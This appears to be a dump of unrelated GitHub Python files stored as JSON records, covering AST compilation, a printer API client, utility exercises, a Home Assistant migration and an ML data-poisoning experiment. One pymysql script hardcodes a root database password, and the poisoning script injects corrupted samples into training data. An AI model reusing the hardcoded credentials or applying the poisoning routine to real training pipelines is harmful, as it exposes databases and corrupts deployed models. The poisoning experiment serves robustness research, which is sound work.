{}\n\n if pyAstModule.matches.Expression:\n if pyAst not in _pyAstToCodeObjectCache:\n _pyAstToCodeObjectCache[pyAst] = compile(\n convertAlgebraicToPyAst(pyAstModule), filename, 'eval'\n )\n\n res = eval(_pyAstToCodeObjectCache[pyAst], globals)\n else:\n if pyAst not in _pyAstToCodeObjectCache:\n _pyAstToCodeObjectCache[pyAst] = compile(\n convertAlgebraicToPyAst(pyAstModule), filename, 'exec'\n )\n\n exec(_pyAstToCodeObjectCache[pyAst], globals)\n\n res = globals[pyAstModule.body[0].name]\n\n # extract any inline code constants from the resulting closure and ensure\n # that we know their definitions as well.\n cacheAstForCode(res.__code__, pyAst)\n\n return res\n\n\ndef replaceFirstComprehensionArg(pyAst):\n \"\"\"Replace the first expression in a comprehension with a '.0' varlookup.\n\n In general, when you write an expression like [x for x in EXPR] inside\n of a python function, you get an inner code object that represents the body\n of the list comprehension in the co_consts. This code object gets used to\n execute the inner stackframe of the list comprehension.\n\n That code object does not contain 'EXPR' - it assumes it gets passed that\n as a variable called '.0'. As a result, we need to make sure we don't embed\n that information in the code object itself.\n \"\"\"\n def stripComprehension(c: Comprehension):\n return Comprehension.Item(\n target=c.target,\n iter=Expr.Name(id=\".0\"),\n ifs=c.ifs,\n is_async=c.is_async\n )\n\n if pyAst.matches.ListComp or pyAst.matches.SetComp or pyAst.matches.GeneratorExp:\n return type(pyAst)(\n elt=pyAst.elt,\n generators=[stripComprehension(pyAst.generators[0])] + list(pyAst.generators[1:]),\n line_number=pyAst.line_number,\n col_offset=pyAst.col_offset,\n filename=pyAst.filename,\n )\n\n if pyAst.matches.DictComp:\n return type(pyAst)(\n key=pyAst.key,\n value=pyAst.value,\n generators=[stripComprehension(pyAst.generators[0])] + list(pyAst.generators[1:]),\n line_number=pyAst.line_number,\n col_offset=pyAst.col_offset,\n filename=pyAst.filename,\n )\n\n return pyAst\n\n\ndef cacheAstForCode(code, pyAst):\n \"\"\"Remember that 'code' is equivalent to pyAst, and also for contained code objects.\"\"\"\n if code in _codeToAlgebraicAst:\n return\n\n # we have to import this within the function to break the import cycle\n from typed_python.compiler.python_ast_analysis import extractFunctionDefsInOrder\n\n codeConstants = [c for c in code.co_consts if isinstance(c, types.CodeType)]\n\n if isinstance(pyAst, (Statement.FunctionDef, Expr.Lambda, Statement.ClassDef, Statement.AsyncFunctionDef)):\n funcDefs = extractFunctionDefsInOrder(pyAst.body)\n else:\n funcDefs = extractFunctionDefsInOrder(pyAst.generators)\n\n if pyAst.matches.ListComp or pyAst.matches.SetComp or pyAst.matches.GeneratorExp:\n funcDefs = extractFunctionDefsInOrder(pyAst.elt) + funcDefs\n\n if pyAst.matches.DictComp:\n funcDefs = (\n extractFunctionDefsInOrder(pyAst.key)\n + extractFunctionDefsInOrder(pyAst.value)\n + funcDefs\n )\n\n _codeToAlgebraicAst[code] = replaceFirstComprehensionArg(\n stripDecoratorFromFuncDef(pyAst)\n )\n\n assert len(funcDefs) == len(codeConstants), (\n f\"Expected {len(funcDefs)} func defs to cover the \"\n f\"{len(codeConstants)} code constants we found in \"\n f\"{code.co_name} in {code.co_filename}:{code.co_firstlineno}\"\n f\" of type {type(pyAst)}\"\n )\n\n for i in range(len(funcDefs)):\n cacheAstForCode(codeConstants[i], funcDefs[i])\n\n\ndef evaluateFunctionDefWithLocalsInCells(pyAst, globals, locals, stripAnnotations=False):\n # make a new FunctionDef that defines a function\n # def f(l1, l2, ...): #l1 ... lN in locals\n # def pyAst():\n # ...\n # return pyAst\n #\n # and then call 'f' to get the closure out\n\n # strip out the decorator definitions. We just want the underlying function\n # object itself.\n if pyAst.matches.FunctionDef:\n statements = [\n Statement.FunctionDef(\n name=pyAst.name,\n args=stripAstArgsAnnotations(pyAst.args) if stripAnnotations else pyAst.args,\n body=pyAst.body,\n decorator_list=(),\n returns=pyAst.returns if not stripAnnotations else None,\n line_number=pyAst.line_number,\n col_offset=pyAst.col_offset,\n filename=pyAst.filename,\n ),\n Statement.Return(value=Expr.Name(id=pyAst.name, ctx=ExprContext.Load()))\n ]\n elif pyAst.matches.AsyncFunctionDef:\n statements = [\n Statement.AsyncFunctionDef(\n name=pyAst.name,\n args=stripAstArgsAnnotations(pyAst.args) if stripAnnotations else pyAst.args,\n body=pyAst.body,\n decorator_list=(),\n returns=pyAst.returns if not stripAnnotations else None,\n line_number=pyAst.line_number,\n col_offset=pyAst.col_offset,\n filename=pyAst.filename,\n ),\n Statement.Return(value=Expr.Name(id=pyAst.name, ctx=ExprContext.Load()))\n ]\n elif pyAst.matches.GeneratorExp or pyAst.matches.ListComp or pyAst.matches.SetComp or pyAst.matches.DictComp:\n # generators and list comprehensions always become functions that yield\n # the elements of the comprehension\n if pyAst.matches.DictComp:\n bodyExpr = Expr.Tuple(elts=(pyAst.key, pyAst.value), ctx=ExprContext.Load())\n else:\n bodyExpr = pyAst.elt\n\n body = Statement.Expr(value=Expr.Yield(value=bodyExpr))\n\n for comprehension in pyAst.generators:\n for ifExpr in comprehension.ifs:\n body = Statement.If(\n test=ifExpr,\n body=[body],\n orelse=[]\n )\n\n body = Statement.For(\n target=comprehension.target,\n iter=comprehension.iter,\n body=[body]\n )\n\n statements = [\n Statement.FunctionDef(\n name=\"__typed_python_generator_builder__\",\n args=Arguments.Item(\n vararg=None,\n kwarg=None\n ),\n body=[body],\n returns=None\n ),\n Statement.Return(value=Expr.Name(id=\"__typed_python_generator_builder__\", ctx=ExprContext.Load()))\n ]\n elif pyAst.matches.Lambda:\n statements = [Statement.Return(value=pyAst)]\n else:\n raise Exception(f\"Can't build a python AST out of {type(pyAst)}\")\n\n pyAstBuilder = Statement.FunctionDef(\n name=\"__typed_python_func_builder__\",\n args=Arguments.Item(\n args=[Arg.Item(arg=name, annotation=None) for name in locals],\n vararg=None,\n kwarg=None\n ),\n body=statements,\n returns=None,\n filename=pyAst.filename\n )\n\n func = evaluateFunctionPyAst(pyAstBuilder, globals)\n\n inner = func(*[val for name, val in locals.items()])\n\n cacheAstForCode(inner.__code__, pyAst)\n\n return inner\n","repo_name":"APrioriInvestments/typed_python","sub_path":"typed_python/python_ast.py","file_name":"python_ast.py","file_ext":"py","file_size_in_byte":42100,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"61"} +{"seq_id":"31121886652","text":"import json\nimport os\nfrom typing import List, Any\n\nimport requests\nfrom dotenv import load_dotenv\nfrom requests.auth import HTTPBasicAuth\n\nfrom consts import *\nfrom models.models import Printer\n\n\nclass PrintNodeAPI:\n\n def __init__(self):\n load_dotenv()\n\n self.req = requests.Session()\n self.headers = {'Accept': 'application/json'}\n self.api_key = os.getenv(API_KEY)\n self.auth = HTTPBasicAuth('apikey', self.api_key)\n\n def get_user_data_from_printnode_api(self):\n response = self.req.get(BASE_URL + WHOAMI, headers=self.headers, auth=self.auth)\n\n return response.text\n\n def get_printers_data_from_printnode_api(self):\n res = self.req.get(BASE_URL + PRINTERS, headers=self.headers, auth=self.auth)\n\n return json.loads(res.text)\n\n def get_user_data_from_printnode_api_by_key(self, api_key: str):\n self.api_key = api_key\n self.auth = HTTPBasicAuth('apikey', self.api_key)\n response = self.req.get(BASE_URL + PRINTERS, headers=self.headers, auth=self.auth)\n print(response.text)\n return json.loads(response.text)\n\n def post_jobs_for_print(self):\n self.headers = {'Accept': 'application/json', \"Content-Type\": \"application/json\"}\n self.api_key = os.getenv(API_KEY)\n self.auth = HTTPBasicAuth('apikey', self.api_key)\n data = {\n \"printerId\": 34,\n \"title\": \"My Test PrintJob\",\n \"contentType\": \"pdf_uri\",\n \"content\": \"http:\\/\\/sometest.com\\/pdfhere\",\n \"source\": \"api documentation!\"\n }\n\n response = self.req.post('https://api.printnode.com/printjobs', headers=self.headers, auth=self.auth, data=data)\n print(response.status_code)\n\n @staticmethod\n def get_printers_list(response_json: List[Any]) -> List[Printer]:\n printers = []\n\n for printer in response_json:\n capabilities = printer.get('capabilities')\n\n printers.append(\n Printer(\n id=str(printer.get('id')),\n name=printer.get('name'),\n description=printer.get('description'),\n nickname=\"\",\n paper_types=str(len(capabilities.get('papers'))),\n state=printer.get('state')\n )\n )\n\n return printers\n\n","repo_name":"Noamico123/LemosProject_BE","sub_path":"external_api_requests/printnode_api.py","file_name":"printnode_api.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24313601496","text":"'''\nfetchone()\n功能:获取下一个查询结果集,结果集是一个对象\nfetchall()\n功能:接收全部的返回的行\nrowcount:是一个只读属性,返回execute()方法影响的行数\n'''\nimport pymysql\n\ndb = pymysql.connect('localhost','root','Zhl19960320','2019.01.02')\ncursor = db.cursor()\n\n#查询数据\nsql = 'select * from bandcard where money>400'\ntry:\n cursor.execute(sql)\n relist = cursor.fetchall()\n for row in relist:\n print('%d--%d'%(row[0], row[1]))\nexcept:\n #如果提交失败,回滚到上一次数据\n db.rollback()\n\ncursor.close()\ndb.close()","repo_name":"HailongZeng/mypython_learning","sub_path":"25、MySQL/2、MySQL与Python交互/7、数据库查询操作.py","file_name":"7、数据库查询操作.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32350189135","text":"\"\"\" transforms/intensity_scale.py (Author: Charley Zhang, 2021) \nBrightness & contrast augmentation via scaling an image's intensity values.\n\"\"\"\n\nimport collections\nimport numbers\n\nimport numpy as np\nimport torch\n\nfrom data.transforms.transform_base import Transform\nfrom lib.utils.parse import parse_probability, parse_bool\n\n\nclass ScaleIntensity(Transform):\n \"\"\" Samples a uniform value & multiplies image with it followed by clipping\n of tranformed image to the intensity bounds of the original image.\n \n (This is called brightness & contrast transformation in PGL paper)\n Properties:\n ✔ Tensor or Numpy Array\n ✔ 3D ✔ 2D\n ✔ Differentiable\n ✔* Invertible (*information loss from clipping)\n \"\"\"\n \n def __init__(self, p=1.0, scale=(0.75, 1.25), return_record=True):\n \"\"\"\n Args:\n p: probability to apply this transform\n mean: can be a value or a tupled range of values to sample from\n var: can be a value or a tupled range of values to sample from\n \"\"\"\n self.p = parse_probability(p, 'p')\n self.return_record = parse_bool(return_record, 'return_record')\n self.scale = self._parse_scale(scale)\n \n \n def apply_transform(self, data, scale=None):\n \"\"\"\n Args:\n image: dict with key 'image' that is a np.array or torch.Tensor\n \"image\" can also be an array or tensor itself.\n gamma: if a value is given for gamma, it will override the any\n preset gamma or range of gammas to sample from.\n \"\"\"\n data = self._parse_data_input(data)\n if torch.rand((1,)).item() > self.p:\n if self.return_record:\n return data, None\n return data\n \n # Sample scale\n scale = self._parse_scale(scale) if scale else self.scale\n if isinstance(scale, collections.Sequence):\n scale = torch.rand((1,)).item() * (scale[1] - scale[0]) + scale[0]\n \n # Apply intenisty scale transform\n is_single_image = False\n if isinstance(data, np.ndarray) or isinstance(data, torch.Tensor):\n is_single_image = True\n data = {'image': data}\n \n ret_data, ret_records = {}, {}\n for k, v in data.items():\n if 'image' in k:\n image = v\n image_min = image.min()\n image_max = image.max()\n \n t_image = ScaleIntensity.scale_intensity(\n image, scale, image_min, image_max)\n ret_data[k] = t_image\n ret_records[k] = {\n 'input_shape': tuple(image.shape),\n 'output_shape': tuple(t_image.shape),\n 'old_image_min': self.to_record_value(image_min),\n 'old_image_max': self.to_record_value(image_max),\n 'intensity_scale': scale\n }\n else:\n ret_data[k] = v\n \n # Return in correct format\n if is_single_image:\n if self.return_record:\n return ret_data['image'], ret_records['image']\n return ret_data['image']\n if self.return_record:\n return ret_data, ret_records\n return ret_data\n\n\n def reapply(self, image, record):\n scale = record['intensity_scale']\n im_min = image.min()\n im_max = image.max() \n return ScaleIntensity.scale_intensity(image, scale, im_min, im_max)\n \n \n def invert(self, image, record):\n scale = record['intensity_scale']\n ret_image = image / scale\n return ret_image\n \n \n @staticmethod\n def scale_intensity(image, scale, clip_min, clip_max):\n assert isinstance(image, np.ndarray) or isinstance(image, torch.Tensor)\n \n ret_image = image * scale\n ret_image = ret_image.clip(clip_min, clip_max)\n return ret_image\n\n \n \n \n \n def _parse_scale(self, value):\n if isinstance(value, numbers.Number):\n return float(value)\n elif isinstance(value, collections.Sequence):\n msg = (f'If you give a sequence for \"scale\", it must be '\n f'length 2, not {len(value)}.')\n value = tuple(value)\n assert len(value) == 2, msg\n \n msg = f'1st value {value[0]} must be smaller than 2nd {value[1]}.'\n assert value[0] <= value[1]\n \n return value\n else:\n msg = '\"scale\" must be a number or a sequence of 2 nums'\n raise ValueError(msg)\n\n\n","repo_name":"charzharr/3D-medseg-pretraining","sub_path":"src/data/transforms/intensity_scale.py","file_name":"intensity_scale.py","file_ext":"py","file_size_in_byte":4673,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"28238228106","text":"import unittest\n\ndef check_permutation(s1, s2):\n if len(s1) != len(s2):\n return False\n\n s1_dict = {}\n s2_dict = {}\n\n for char in s1:\n if char in s1_dict:\n s1_dict[char] += 1\n else:\n s1_dict[char] = 1\n\n for char in s2:\n if char in s2_dict:\n s2_dict[char] += 1\n else:\n s2_dict[char] = 1\n\n for key, value in s1_dict.items():\n if key not in s2_dict or value != s2_dict[key]:\n return False\n\n return True\n\nclass Test(unittest.TestCase):\n def test_check_permutation(self):\n self.assertTrue(check_permutation(\"god\", \"dog\"))\n self.assertFalse(check_permutation(\"abcdefgh\", \"abcdefgk\"))\n\nif __name__==\"__main__\":\n unittest.main()\n\n","repo_name":"withinfinitedegreesoffreedom/datastructures-algorithms","sub_path":"arrays-strings/check_permutation.py","file_name":"check_permutation.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5182160226","text":"\nfrom keras.utils import to_categorical\nimport numpy as np\nimport random\nfrom attack import posioning_attack\nfrom utility import *\nimport numpy as np\nfrom keras.callbacks import EarlyStopping\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.datasets import make_moons, make_circles, make_classification\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.gaussian_process import GaussianProcessClassifier\nfrom sklearn.gaussian_process.kernels import RBF\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.multiclass import OneVsOneClassifier\nfrom sklearn import linear_model\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.utils import shuffle\n\ndef generate_poisoning(model,dataset,training_info,parameters,functions):\n # generate the poisong data without training.\n\n poisoning_data = posioning_attack(training_info['poisoning_type'],dataset,model,training_info['poisoning_fraction'],training_info,is_load = False)\n return poisoning_data\n\n\ndef call_training(model,dataset,training_info,parameters,functions):\n # call the training method based on the parameter\n\n if training_info['training_type'] == 'normal':\n model,history = training_network(model,dataset,training_info,parameters,functions)\n elif training_info['training_type'] == 'online':\n model,history = online_training_network(model,dataset,training_info,parameters,functions)\n elif training_info['training_type'] == 'transfer':\n model,history = transfer_learning(model,dataset,training_info,parameters,functions)\n elif training_info['training_type'] == 'classification':\n model,history = training_ml_mdoel(model,dataset,training_info,parameters,functions)\n\n return model,history\n\n\n\ndef training_ml_mdoel(model,dataset,training_info,parameters,functions):\n data = load_and_generate_dataset(model,dataset,training_info,parameters,functions)\n x_train = data['x_train']\n y_train = data['y_train']\n x_test = data['x_test']\n y_test = data['y_test']\n print(x_train.shape)\n print(y_train.shape)\n print('ML Model')\n\n\n\n\n\ndef training_network(model,dataset,training_info,parameters,functions):\n # normal learning: trained the whole model with the poisoned dataset\n # input: model, dataset, training information\n # output: trained model\n\n data = load_and_generate_dataset(model,dataset,training_info,parameters,functions)\n x_train = data['x_train']\n y_train = data['y_train']\n x_test = data['x_test']\n y_test = data['y_test']\n\n x_train = np.concatenate((x_train, data['x_p']), axis=0)\n y_train = np.concatenate((y_train, data['y_p']), axis=0)\n overfitCallback = EarlyStopping(monitor='loss', min_delta=0, patience = 20)\n\n history = model.fit(x_train,y_train, validation_data = (x_test,y_test),epochs=10000000, callbacks=[overfitCallback], batch_size=training_info['batch_size'],verbose = training_info['print_process'])\n\n if training_info['plot_loss']:\n filename = training_info['dataset_name']+'_'+training_info['model_name']\n if training_info['is_poisoning']:\n filename = filename + '_' + training_info['poisoning_type'] + '_' + str(training_info['poisoning_fraction'])\n save_history(history,filename)\n\n train_acc = history.history['acc'][-1]\n acc = history.history['val_acc'][-1]\n train_loss = history.history['loss'][-1]\n loss = history.history['val_loss'][-1]\n\n print_information(model,training_info,parameters,functions,train_acc,acc,train_loss,loss)\n return model,history.history\n\ndef online_training_network(model,dataset,training_info,parameters,functions):\n # online learning: train the whole model on the clean dataset and update the model by each example based on the online sgd.\n # input: model, dataset, training information\n # output: trained model\n data = load_and_generate_dataset(model,dataset,training_info,parameters,functions)\n x_train = data['x_train']\n y_train = data['y_train']\n x_test = data['x_test']\n y_test = data['y_test']\n x_p = data['x_p']\n y_p = data['y_p']\n\n x_train = np.concatenate((x_train, data['x_p']), axis=0)\n y_train = np.concatenate((y_train, data['y_p']), axis=0)\n\n\n x_train, y_train = shuffle(x_train, y_train, random_state=0)\n\n overfitCallback = EarlyStopping(monitor='loss', min_delta=0, patience = 20)\n\n history = model.fit(x_train,y_train, validation_data = (x_test,y_test),epochs=100, callbacks=[overfitCallback], batch_size=1,verbose = training_info['print_process'])\n\n\n train_acc = history.history['acc'][-1]\n acc = history.history['val_acc'][-1]\n train_loss = history.history['loss'][-1]\n loss = history.history['val_loss'][-1]\n\n\n print_information(model,training_info,parameters,functions,train_acc,acc,train_loss,loss)\n return model,history.history\n\n\ndef transfer_learning(model,dataset,training_info,parameters,functions):\n # transfer learning: train the whole model on the clean dataset and fix the all the layers except the last layer.\n # input: model, dataset, training information\n # output: trained model\n data = load_and_generate_dataset(model,dataset,training_info,parameters,functions)\n x_train = data['x_train']\n y_train = data['y_train']\n x_test = data['x_test']\n y_test = data['y_test']\n\n overfitCallback = EarlyStopping(monitor='loss', min_delta=0, patience = 20)\n\n history = model.fit(x_train,y_train, validation_data = (x_test,y_test),epochs=10000000, callbacks=[overfitCallback], batch_size=training_info['batch_size'],verbose = training_info['print_process'])\n\n\n print('before training loss: %.3f' %history.history['loss'][-1])\n print('before test loss: %.3f' % history.history['val_loss'][-1])\n print('before training acc: %.3f' %history.history['acc'][-1])\n print('before test acc: %.3f' %history.history['acc'][-1])\n\n for layer in model.layers[:-1]:\n layer.trainable = False\n model.compile(optimizer=functions['optimizer'],loss=functions['loss'],metrics= functions['metrics'])\n\n x_train = np.concatenate((x_train, data['x_p']), axis=0)\n y_train = np.concatenate((y_train, data['y_p']), axis=0)\n\n overfitCallback = EarlyStopping(monitor='loss', min_delta=0, patience = 20)\n\n history = model.fit(x_train,y_train, validation_data = (x_test,y_test),epochs=10000000, callbacks=[overfitCallback], batch_size=training_info['batch_size'],verbose = training_info['print_process'])\n\n train_acc = history.history['acc'][-1]\n acc = history.history['val_acc'][-1]\n train_loss = history.history['loss'][-1]\n loss = history.history['val_loss'][-1]\n\n print_information(model,training_info,parameters,functions,train_acc,acc,train_loss,loss)\n return model,history.history\n\n\n\ndef load_and_generate_dataset(model,dataset,training_info,parameters,functions):\n # combine the clean dataset and poisoning dataset\n # input: model,clean dataset, training information\n # output: combined dataset\n x_train = dataset['clean_train']['X']\n y_train = dataset['clean_train']['Y']\n x_test = dataset['clean_test']['X']\n y_test = dataset['clean_test']['Y']\n x_train,y_train,x_test,y_test =convert_dataset(training_info['model_name'],x_train,y_train,x_test,y_test,training_info)\n\n if training_info['is_poisoning'] == True:\n dataset = posioning_attack(training_info['poisoning_type'],dataset,model,training_info['poisoning_fraction'],training_info,is_load=True)\n x_p = dataset[\"poisoning_data\"]['X']\n y_p = dataset[\"poisoning_data\"]['Y']\n\n if training_info['model_name'] == 'MLP':\n x_p = x_p.reshape(-1,x_train.shape[1])\n else:\n x_p = x_p.reshape(-1,x_train.shape[1],x_train.shape[2],x_train.shape[3])\n else:\n poisoning_samples = int(training_info['poisoning_fraction'] * x_train.shape[0])\n x_p = x_train[:poisoning_samples]\n y_p = y_train[:poisoning_samples]\n\n\n random_index = np.random.randint(0, x_train.shape[0],x_p.shape[0])\n\n x_train = np.delete(x_train, random_index,axis=0)\n y_train = np.delete(y_train, random_index,axis=0)\n\n data = {}\n data['x_train'] = x_train\n data['y_train'] = y_train\n data['x_test'] = x_test\n data['y_test'] = y_test\n data['x_p'] = x_p\n data['y_p'] = y_p\n return data\n\ndef print_information(model,training_info,parameters,functions,train_acc,acc,train_loss,loss):\n #print the training information\n\n print('--------------Training Information---------------')\n if training_info['print_model'] == True:\n print(model.summary())\n print('Input shape: '+ str(parameters['input_shape']))\n print('Output shape: '+ str(parameters['output_shape']))\n print('dataset: ' + training_info['dataset_name'])\n print('model name: ' + training_info['model_name'])\n print('learning_rate: '+ str(training_info['learning_rate']))\n print('batch_size: '+ str(training_info['batch_size']))\n # print('learning epochs: '+ str(training_info['training_epoch']))\n\n print('training loss: %.3f' %train_loss)\n print('test loss: %.3f' % loss)\n print('training acc: %.3f' %train_acc)\n print('test acc: %.3f' %acc)\n print('optimizer: ' + functions['optimizer'] )\n print('training method: ' + training_info['training_type'])\n print('Is poisoning attack: '+ str(training_info['is_poisoning']))\n if training_info['is_poisoning']:\n print('poisoning attack:' + training_info['poisoning_type'])\n print('poisoning fraction: '+ str(training_info['poisoning_fraction']))\n if training_info['poisoning_type'] == 'gradient_ascent':\n print('poisoning degree: '+ str(training_info['posioned_round']))\n print('-------------------------------------------------')\n","repo_name":"changhongyan123/poisoning","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29838092217","text":"metadata = dict(\n name='Vermont',\n abbreviation='vt',\n legislature_name='Vermont General Assembly',\n upper_chamber_name='Senate',\n lower_chamber_name='House of Representatives',\n upper_chamber_title='Senator',\n lower_chamber_title='Representative',\n upper_chamber_term=2,\n lower_chamber_term=2,\n terms=[],\n)\n\n# Populate 'sessions' and 'session_details'\nfor year in [y for y in xrange(1987, 2010) if y % 2]:\n term = \"%d-%d\" % (year, year + 1)\n metadata['terms'].append(dict(\n name=term,\n start_year=year,\n end_year=year + 1,\n sessions=[term]))\n","repo_name":"runderwood/fiftystates","sub_path":"fiftystates/scrape/vt/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"22956687553","text":"\nfrom vsg.token import context_reference as token\n\nfrom vsg.vhdlFile import utils\n\nfrom vsg.vhdlFile.classify import utils as classify_utils\n\n\ndef detect(iCurrent, lObjects):\n '''\n context_reference ::=\n context selected_name { , selected_name } ;\n '''\n if utils.object_value_is(lObjects, iCurrent, 'context'):\n if not utils.find_in_range('is', iCurrent, ';', lObjects):\n return classify(iCurrent, lObjects)\n return iCurrent\n\n\ndef classify(iToken, lObjects):\n\n iCurrent = utils.assign_next_token_required('context', token.keyword, iToken, lObjects)\n iCurrent = classify_utils.classify_selected_name(iCurrent, lObjects, token)\n while utils.is_next_token(',', iCurrent, lObjects):\n iCurrent = utils.assign_next_token_required(',', token.comma, iCurrent, lObjects)\n iCurrent = classify_utils.classify_selected_name(iCurrent, lObjects, token)\n\n iCurrent = utils.assign_next_token_required(';', token.semicolon, iCurrent, lObjects)\n return iCurrent\n","repo_name":"jeremiah-c-leary/vhdl-style-guide","sub_path":"vsg/vhdlFile/classify/context_reference.py","file_name":"context_reference.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"61"} +{"seq_id":"20917428137","text":"def solve(numLegs,numHeads):\n for numChicks in range(0, numHeads + 1):\n numPlgs = numHeads - numChicks\n totLegs = 4 *numPlgs + 2 *numChicks\n if totLegs == numLegs:\n return (numPlgs,numChicks)\n return(None, None)\n\ndef barnyard():\n heads = input(\"Enter number of heads: \")\n legs = input(\"Enter a number of legs: \")\n pigs, chickens = solve(int(heads),int(legs))\n if pigs == None:\n print(\"There is no solution \")\n else:\n print(\"Number of pigs:\", pigs)\n print(\"Number of chickens:\", chickens)\n","repo_name":"munalshah13/Python_Exercises","sub_path":"PigsandChickens.py","file_name":"PigsandChickens.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15331188529","text":"\"\"\"\nPlatform for Tuya WiFi-connected devices.\n\nBased on nikrolls/homeassistant-goldair-climate for Goldair branded devices.\nBased on sean6541/tuya-homeassistant for service call logic, and TarxBoy's\ninvestigation into Goldair's tuyapi statuses\nhttps://github.com/codetheweb/tuyapi/issues/31.\n\"\"\"\nimport logging\n\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import CONF_HOST\nfrom homeassistant.core import HomeAssistant, callback\nfrom homeassistant.helpers.entity_registry import async_migrate_entries\nfrom homeassistant.util import slugify\n\nfrom .const import (\n CONF_DEVICE_ID,\n CONF_LOCAL_KEY,\n CONF_POLL_ONLY,\n CONF_PROTOCOL_VERSION,\n CONF_TYPE,\n DOMAIN,\n)\nfrom .device import async_delete_device, get_device_id, setup_device\nfrom .helpers.device_config import get_config\n\n_LOGGER = logging.getLogger(__name__)\nNOT_FOUND = \"Configuration file for %s not found\"\n\n\nasync def async_migrate_entry(hass, entry: ConfigEntry):\n \"\"\"Migrate to latest config format.\"\"\"\n\n CONF_TYPE_AUTO = \"auto\"\n\n if entry.version == 1:\n # Removal of Auto detection.\n config = {**entry.data, **entry.options, \"name\": entry.title}\n if config[CONF_TYPE] == CONF_TYPE_AUTO:\n device = setup_device(hass, config)\n config[CONF_TYPE] = await device.async_inferred_type()\n if config[CONF_TYPE] is None:\n _LOGGER.error(\n \"Unable to determine type for device %s\",\n config[CONF_DEVICE_ID],\n )\n return False\n\n entry.data = {\n CONF_DEVICE_ID: config[CONF_DEVICE_ID],\n CONF_LOCAL_KEY: config[CONF_LOCAL_KEY],\n CONF_HOST: config[CONF_HOST],\n }\n entry.version = 2\n\n if entry.version == 2:\n # CONF_TYPE is not configurable, move from options to main config.\n config = {**entry.data, **entry.options, \"name\": entry.title}\n opts = {**entry.options}\n # Ensure type has been migrated. Some users are reporting errors which\n # suggest it was removed completely. But that is probably due to\n # overwriting options without CONF_TYPE.\n if config.get(CONF_TYPE, CONF_TYPE_AUTO) == CONF_TYPE_AUTO:\n device = setup_device(hass, config)\n config[CONF_TYPE] = await device.async_inferred_type()\n if config[CONF_TYPE] is None:\n _LOGGER.error(\n \"Unable to determine type for device %s\",\n config[CONF_DEVICE_ID],\n )\n return False\n entry.data = {\n CONF_DEVICE_ID: config[CONF_DEVICE_ID],\n CONF_LOCAL_KEY: config[CONF_LOCAL_KEY],\n CONF_HOST: config[CONF_HOST],\n CONF_TYPE: config[CONF_TYPE],\n }\n opts.pop(CONF_TYPE, None)\n entry.options = {**opts}\n entry.version = 3\n\n if entry.version == 3:\n # Migrate to filename based config_type, to avoid needing to\n # parse config files to find the right one.\n config = {**entry.data, **entry.options, \"name\": entry.title}\n config_type = get_config(config[CONF_TYPE]).config_type\n\n # Special case for kogan_switch. Consider also v2.\n if config_type == \"smartplugv1\":\n device = setup_device(hass, config)\n config_type = await device.async_inferred_type()\n if config_type != \"smartplugv2\":\n config_type = \"smartplugv1\"\n\n entry.data = {\n CONF_DEVICE_ID: config[CONF_DEVICE_ID],\n CONF_LOCAL_KEY: config[CONF_LOCAL_KEY],\n CONF_HOST: config[CONF_HOST],\n CONF_TYPE: config_type,\n }\n entry.version = 4\n\n if entry.version <= 5:\n # Migrate unique ids of existing entities to new format\n old_id = entry.unique_id\n conf_file = get_config(entry.data[CONF_TYPE])\n if conf_file is None:\n _LOGGER.error(NOT_FOUND, entry.data[CONF_TYPE])\n return False\n\n @callback\n def update_unique_id(entity_entry):\n \"\"\"Update the unique id of an entity entry.\"\"\"\n e = conf_file.primary_entity\n if e.entity != entity_entry.platform:\n for e in conf_file.secondary_entities():\n if e.entity == entity_entry.platform:\n break\n if e.entity == entity_entry.platform:\n new_id = e.unique_id(old_id)\n if new_id != old_id:\n _LOGGER.info(\n \"Migrating %s unique_id %s to %s\",\n e.entity,\n old_id,\n new_id,\n )\n return {\n \"new_unique_id\": entity_entry.unique_id.replace(\n old_id,\n new_id,\n )\n }\n\n await async_migrate_entries(hass, entry.entry_id, update_unique_id)\n entry.version = 6\n\n if entry.version <= 8:\n # Deprecated entities are removed, trim the config back to required\n # config only\n conf = {**entry.data, **entry.options}\n entry.data = {\n CONF_DEVICE_ID: conf[CONF_DEVICE_ID],\n CONF_LOCAL_KEY: conf[CONF_LOCAL_KEY],\n CONF_HOST: conf[CONF_HOST],\n CONF_TYPE: conf[CONF_TYPE],\n }\n entry.options = {}\n entry.version = 9\n\n if entry.version <= 9:\n # Added protocol_version, default to auto\n conf = {**entry.data, **entry.options}\n entry.data = {\n CONF_DEVICE_ID: conf[CONF_DEVICE_ID],\n CONF_LOCAL_KEY: conf[CONF_LOCAL_KEY],\n CONF_HOST: conf[CONF_HOST],\n CONF_TYPE: conf[CONF_TYPE],\n CONF_PROTOCOL_VERSION: \"auto\",\n }\n entry.options = 